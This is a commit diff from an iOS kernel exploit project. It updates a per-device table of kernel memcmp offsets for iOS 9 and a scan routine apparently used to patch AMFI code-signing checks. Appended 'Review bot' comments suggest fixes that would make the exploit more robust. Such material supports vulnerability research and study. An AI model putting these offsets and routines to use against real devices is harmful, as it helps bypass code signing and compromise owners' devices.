add find_memcmp() offsets

GSoC/Meterpreter_Web_Console
Tim W 2018-10-22 19:48:32 +08:00
parent abdbc89171
commit 71bf4ead73
2 changed files with 129 additions and 133 deletions


@ -1263,7 +1263,7 @@ void init_exploit(void * dlsym_addr, void * dlopen_addr)
amfi_macho = (void*)((uint32_t)amfi_macho - 0x1000); amfi_macho = (void*)((uint32_t)amfi_macho - 0x1000);
} }
uint32_t memcmp_what = kernel_start + find_memcmp(); uint32_t memcmp_what = kernel_start + find_memcmp() + 1;
debug_print("memcmp_what %p\n", (void*)(memcmp_what)); debug_print("memcmp_what %p\n", (void*)(memcmp_what));
uint32_t amfi_memcmp_off; uint32_t amfi_memcmp_off;
for (amfi_memcmp_off = amfi_macho_start; amfi_memcmp_off < kernel_size; amfi_memcmp_off += 4) { for (amfi_memcmp_off = amfi_macho_start; amfi_memcmp_off < kernel_size; amfi_memcmp_off += 4) {
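Review bot: `memcmp_what` on the third line of the hunk is computed from `find_memcmp()` without checking that an offset was actually found; `find_memcmp()` returns 0 from its `default` case for any target_environment not in its table, so on an unsupported target the value becomes `kernel_start + 1` and the scan loop on the last line hunts for a pointer that cannot exist. Guard it before the scan, e.g. `unsigned int memcmp_off = find_memcmp(); if (memcmp_off == 0) { debug_print("find_memcmp: no offset for this target\n"); return; }` and build `memcmp_what` from `memcmp_off`. The new `+ 1` also has no explanation; a short comment such as `/* +1: presumably the Thumb bit on the function address -- confirm */` would save the next reader a detour. init_exploit's body begins and continues outside this hunk.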


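--- a/PATH_NOT_SHOWN_ON_PAGE
+++ b/PATH_NOT_SHOWN_ON_PAGE
@@ -2810,138 +2810,134 @@ static inline unsigned int find_mac_proc_check(void) {
 /*3588 0x000c3c80 0x800c4c80 GLOBAL FUNC 0 _memcmp*/
 static inline unsigned int find_memcmp(void) {
 switch (target_environment) {
-case iPhone41_iOS902: return 0xc3c80;
-case iPhone41_iOS910: return 0xc3c80;
-case iPhone41_iOS920: return 0xc3c80;
-case iPhone41_iOS921: return 0xc3c80;
-case iPhone41_iOS930: return 0xc3c80;
-case iPhone41_iOS931: return 0xc3c80;
-case iPhone41_iOS932: return 0xc3c80;
-case iPhone41_iOS933: return 0xc3c80;
-case iPhone41_iOS934: return 0xc3c80;
-case iPhone51_iOS910: return 0xc3c80;
-case iPhone51_iOS920: return 0xc3c80;
-case iPhone51_iOS921: return 0xc3c80;
-case iPhone51_iOS930: return 0xc3c80;
-case iPhone51_iOS931: return 0xc3c80;
-case iPhone51_iOS932: return 0xc3c80;
-case iPhone51_iOS933: return 0xc3c80;
-case iPhone51_iOS934: return 0xc3c80;
-case iPhone52_iOS902: return 0xc3c80;
-case iPhone52_iOS910: return 0xc3c80;
-case iPhone52_iOS920: return 0xc3c80;
-case iPhone52_iOS921: return 0xc3c80;
-case iPhone52_iOS930: return 0xc3c80;
-case iPhone52_iOS931: return 0xc3c80;
-case iPhone52_iOS932: return 0xc3c80;
-case iPhone52_iOS933: return 0xc3c80;
-case iPhone52_iOS934: return 0xc3c80;
-case iPhone53_iOS910: return 0xc3c80;
-case iPhone53_iOS920: return 0xc3c80;
-case iPhone53_iOS921: return 0xc3c80;
-case iPhone53_iOS930: return 0xc3c80;
-case iPhone53_iOS931: return 0xc3c80;
-case iPhone53_iOS932: return 0xc3c80;
-case iPhone53_iOS933: return 0xc3c80;
-case iPhone53_iOS934: return 0xc3c80;
-case iPhone54_iOS910: return 0xc3c80;
-case iPhone54_iOS920: return 0xc3c80;
-case iPhone54_iOS921: return 0xc3c80;
-case iPhone54_iOS930: return 0xc3c80;
-case iPhone54_iOS931: return 0xc3c80;
-case iPhone54_iOS932: return 0xc3c80;
-case iPhone54_iOS933: return 0xc3c80;
-case iPhone54_iOS934: return 0xc3c80;
-case iPad21_iOS910: return 0xc3c80;
-case iPad21_iOS920: return 0xc3c80;
-case iPad21_iOS921: return 0xc3c80;
-case iPad21_iOS930: return 0xc3c80;
-case iPad21_iOS931: return 0xc3c80;
-case iPad21_iOS932: return 0xc3c80;
-case iPad21_iOS933: return 0xc3c80;
-case iPad21_iOS934: return 0xc3c80;
-case iPad22_iOS910: return 0xc3c80;
-case iPad22_iOS920: return 0xc3c80;
-case iPad22_iOS921: return 0xc3c80;
-case iPad22_iOS930: return 0xc3c80;
-case iPad22_iOS931: return 0xc3c80;
-case iPad22_iOS932: return 0xc3c80;
-case iPad22_iOS933: return 0xc3c80;
-case iPad22_iOS934: return 0xc3c80;
-case iPad23_iOS910: return 0xc3c80;
-case iPad23_iOS920: return 0xc3c80;
-case iPad23_iOS921: return 0xc3c80;
-case iPad23_iOS930: return 0xc3c80;
-case iPad23_iOS931: return 0xc3c80;
-case iPad23_iOS932: return 0xc3c80;
-case iPad23_iOS933: return 0xc3c80;
-case iPad23_iOS934: return 0xc3c80;
-case iPad24_iOS910: return 0xc3c80;
-case iPad24_iOS920: return 0xc3c80;
-case iPad24_iOS921: return 0xc3c80;
-case iPad24_iOS930: return 0xc3c80;
-case iPad24_iOS931: return 0xc3c80;
-case iPad24_iOS932: return 0xc3c80;
-case iPad24_iOS933: return 0xc3c80;
-case iPad24_iOS934: return 0xc3c80;
-case iPad25_iOS902: return 0xc3c80;
-case iPad31_iOS910: return 0xc3c80;
-case iPad31_iOS920: return 0xc3c80;
-case iPad31_iOS921: return 0xc3c80;
-case iPad31_iOS930: return 0xc3c80;
-case iPad31_iOS931: return 0xc3c80;
-case iPad31_iOS932: return 0xc3c80;
-case iPad31_iOS933: return 0xc3c80;
-case iPad31_iOS934: return 0xc3c80;
-case iPad32_iOS910: return 0xc3c80;
-case iPad32_iOS920: return 0xc3c80;
-case iPad32_iOS921: return 0xc3c80;
-case iPad32_iOS930: return 0xc3c80;
-case iPad32_iOS931: return 0xc3c80;
-case iPad32_iOS932: return 0xc3c80;
-case iPad32_iOS933: return 0xc3c80;
-case iPad32_iOS934: return 0xc3c80;
-case iPad33_iOS902: return 0xc3c80;
-case iPad33_iOS910: return 0xc3c80;
-case iPad33_iOS920: return 0xc3c80;
-case iPad33_iOS921: return 0xc3c80;
-case iPad33_iOS930: return 0xc3c80;
-case iPad33_iOS931: return 0xc3c80;
-case iPad33_iOS932: return 0xc3c80;
-case iPad33_iOS933: return 0xc3c80;
-case iPad33_iOS934: return 0xc3c80;
-case iPad34_iOS910: return 0xc3c80;
-case iPad34_iOS920: return 0xc3c80;
-case iPad34_iOS921: return 0xc3c80;
-case iPad34_iOS930: return 0xc3c80;
-case iPad34_iOS931: return 0xc3c80;
-case iPad34_iOS932: return 0xc3c80;
-case iPad34_iOS933: return 0xc3c80;
-case iPad34_iOS934: return 0xc3c80;
-case iPad35_iOS910: return 0xc3c80;
-case iPad35_iOS920: return 0xc3c80;
-case iPad35_iOS921: return 0xc3c80;
-case iPad35_iOS930: return 0xc3c80;
-case iPad35_iOS931: return 0xc3c80;
-case iPad35_iOS932: return 0xc3c80;
-case iPad35_iOS933: return 0xc3c80;
-case iPad35_iOS934: return 0xc3c80;
-case iPad36_iOS910: return 0xc3c80;
-case iPad36_iOS920: return 0xc3c80;
-case iPad36_iOS921: return 0xc3c80;
-case iPad36_iOS930: return 0xc3c80;
-case iPad36_iOS931: return 0xc3c80;
-case iPad36_iOS932: return 0xc3c80;
-case iPad36_iOS933: return 0xc3c80;
-case iPad36_iOS934: return 0xc3c80;
-case iPod51_iOS910: return 0xc3c80;
-case iPod51_iOS920: return 0xc3c80;
-case iPod51_iOS921: return 0xc3c80;
-case iPod51_iOS930: return 0xc3c80;
-case iPod51_iOS931: return 0xc3c80;
-case iPod51_iOS932: return 0xc3c80;
-case iPod51_iOS933: return 0xc3c80;
-case iPod51_iOS934: return 0xc3c80;
+case iPhone41_iOS934: return 0x000c085c;
+case iPhone41_iOS933: return 0x000c085c;
+case iPhone41_iOS932: return 0x000c08ec;
+case iPhone41_iOS930: return 0x000c08dc;
+case iPhone41_iOS921: return 0x000bfd7c;
+case iPhone41_iOS920: return 0x000bfd2c;
+case iPhone41_iOS910: return 0x000c1340;
+case iPhone41_iOS902: return 0x000c11d0;
+case iPhone51_iOS934: return 0x000c3e10;
+case iPhone51_iOS933: return 0x000c3e10;
+case iPhone51_iOS932: return 0x000c3c80;
+case iPhone51_iOS930: return 0x000c3c90;
+case iPhone51_iOS921: return 0x000c2ff0;
+case iPhone51_iOS920: return 0x000c2fb0;
+case iPhone51_iOS910: return 0x000c42c4;
+/*case iPhone51_iOS902: return 0x000c4124;*/
+case iPhone52_iOS934: return 0x000c3e10;
+case iPhone52_iOS933: return 0x000c3e10;
+case iPhone52_iOS932: return 0x000c3c80;
+case iPhone52_iOS930: return 0x000c3c90;
+case iPhone52_iOS921: return 0x000c2ff0;
+case iPhone52_iOS920: return 0x000c2fb0;
+case iPhone52_iOS910: return 0x000c42c4;
+case iPhone52_iOS902: return 0x000c4124;
+case iPhone53_iOS934: return 0x000c3e10;
+case iPhone53_iOS933: return 0x000c3e10;
+case iPhone53_iOS932: return 0x000c3c80;
+case iPhone53_iOS930: return 0x000c3c90;
+case iPhone53_iOS921: return 0x000c2ff0;
+case iPhone53_iOS920: return 0x000c2fb0;
+case iPhone53_iOS910: return 0x000c42c4;
+/*case iPhone53_iOS902: return 0x000c4124;*/
+case iPhone54_iOS934: return 0x000c3e10;
+case iPhone54_iOS933: return 0x000c3e10;
+case iPhone54_iOS932: return 0x000c3c80;
+case iPhone54_iOS930: return 0x000c3c90;
+case iPhone54_iOS921: return 0x000c2ff0;
+case iPhone54_iOS920: return 0x000c2fb0;
+case iPhone54_iOS910: return 0x000c42c4;
+/*case iPhone54_iOS902: return 0x000c4124;*/
+case iPad21_iOS934: return 0x000c085c;
+case iPad21_iOS933: return 0x000c085c;
+case iPad21_iOS932: return 0x000c08ec;
+case iPad21_iOS930: return 0x000c08dc;
+case iPad21_iOS921: return 0x000bfd7c;
+case iPad21_iOS920: return 0x000bfd2c;
+case iPad21_iOS910: return 0x000c1340;
+/*case iPad21_iOS902: return 0x000c11d0;*/
+case iPad22_iOS934: return 0x000c085c;
+case iPad22_iOS933: return 0x000c085c;
+case iPad22_iOS932: return 0x000c08ec;
+case iPad22_iOS930: return 0x000c08dc;
+case iPad22_iOS921: return 0x000bfd7c;
+case iPad22_iOS920: return 0x000bfd2c;
+case iPad22_iOS910: return 0x000c1340;
+/*case iPad22_iOS902: return 0x000c11d0;*/
+case iPad23_iOS934: return 0x000c085c;
+case iPad23_iOS933: return 0x000c085c;
+case iPad23_iOS932: return 0x000c08ec;
+case iPad23_iOS930: return 0x000c08dc;
+case iPad23_iOS921: return 0x000bfd7c;
+case iPad23_iOS920: return 0x000bfd2c;
+case iPad23_iOS910: return 0x000c1340;
+/*case iPad23_iOS902: return 0x000c11d0;*/
+case iPad24_iOS934: return 0x000c085c;
+case iPad24_iOS933: return 0x000c085c;
+case iPad24_iOS932: return 0x000c08ec;
+case iPad24_iOS930: return 0x000c08dc;
+case iPad24_iOS921: return 0x000bfd7c;
+case iPad24_iOS920: return 0x000bfd2c;
+case iPad24_iOS910: return 0x000c1340;
+/*case iPad24_iOS902: return 0x000c11d0;*/
+case iPad31_iOS934: return 0x000c085c;
+case iPad31_iOS933: return 0x000c085c;
+case iPad31_iOS932: return 0x000c08ec;
+case iPad31_iOS930: return 0x000c08dc;
+case iPad31_iOS921: return 0x000bfd7c;
+case iPad31_iOS920: return 0x000bfd2c;
+case iPad31_iOS910: return 0x000c1340;
+/*case iPad31_iOS902: return 0x000c11d0;*/
+case iPad32_iOS934: return 0x000c085c;
+case iPad32_iOS933: return 0x000c085c;
+case iPad32_iOS932: return 0x000c08ec;
+case iPad32_iOS930: return 0x000c08dc;
+case iPad32_iOS921: return 0x000bfd7c;
+case iPad32_iOS920: return 0x000bfd2c;
+case iPad32_iOS910: return 0x000c1340;
+/*case iPad32_iOS902: return 0x000c11d0;*/
+case iPad33_iOS934: return 0x000c085c;
+case iPad33_iOS933: return 0x000c085c;
+case iPad33_iOS932: return 0x000c08ec;
+case iPad33_iOS930: return 0x000c08dc;
+case iPad33_iOS921: return 0x000bfd7c;
+case iPad33_iOS920: return 0x000bfd2c;
+case iPad33_iOS910: return 0x000c1340;
+/*case iPad33_iOS902: return 0x000c11d0;*/
+case iPad34_iOS934: return 0x000c3e10;
+case iPad34_iOS933: return 0x000c3e10;
+case iPad34_iOS932: return 0x000c3c80;
+case iPad34_iOS930: return 0x000c3c90;
+case iPad34_iOS921: return 0x000c2ff0;
+case iPad34_iOS920: return 0x000c2fb0;
+case iPad34_iOS910: return 0x000c42c4;
+/*case iPad34_iOS902: return 0x000c4124;*/
+case iPad35_iOS934: return 0x000c3e10;
+case iPad35_iOS933: return 0x000c3e10;
+case iPad35_iOS932: return 0x000c3c80;
+case iPad35_iOS930: return 0x000c3c90;
+case iPad35_iOS921: return 0x000c2ff0;
+case iPad35_iOS920: return 0x000c2fb0;
+case iPad35_iOS910: return 0x000c42c4;
+/*case iPad35_iOS902: return 0x000c4124;*/
+case iPad36_iOS934: return 0x000c3e10;
+case iPad36_iOS933: return 0x000c3e10;
+case iPad36_iOS932: return 0x000c3c80;
+case iPad36_iOS930: return 0x000c3c90;
+case iPad36_iOS921: return 0x000c2ff0;
+case iPad36_iOS920: return 0x000c2fb0;
+case iPad36_iOS910: return 0x000c42c4;
+/*case iPad36_iOS902: return 0x000c4124;*/
+case iPod51_iOS934: return 0x000c085c;
+case iPod51_iOS933: return 0x000c085c;
+case iPod51_iOS932: return 0x000c08ec;
+case iPod51_iOS930: return 0x000c08dc;
+case iPod51_iOS921: return 0x000bfd7c;
+case iPod51_iOS920: return 0x000bfd2c;
+case iPod51_iOS910: return 0x000c1340;
+/*case iPod51_iOS902: return 0x000c11d0;*/
 default: return 0;
 }
 }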
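Review bot: The rewritten table contains no `*_iOS931` entries at all, whereas the old one had one per device, so every iOS 9.3.1 target_environment now silently reaches `default: return 0;` and the caller adds that 0 to kernel_start without any check. If 9.3.1 is deliberately unsupported, make that visible rather than implicit, e.g. a comment `/* iOS 9.3.1: no memcmp offset available for any device */` above `default:`, and consider having the default path log the unsupported target so the failure is diagnosable. The symbol-table comment above the function (`/*3588 0x000c3c80 0x800c4c80 GLOBAL FUNC 0 _memcmp*/`) was accurate when every case returned 0xc3c80 but now matches only a handful of entries; either name the kernel build it was taken from or drop it. The commented-out `iOS902` cases are dead code; if they are kept as a record of unverified values, a one-line comment saying so (`/* 9.0.2 values below are unverified */`) would make the intent clear.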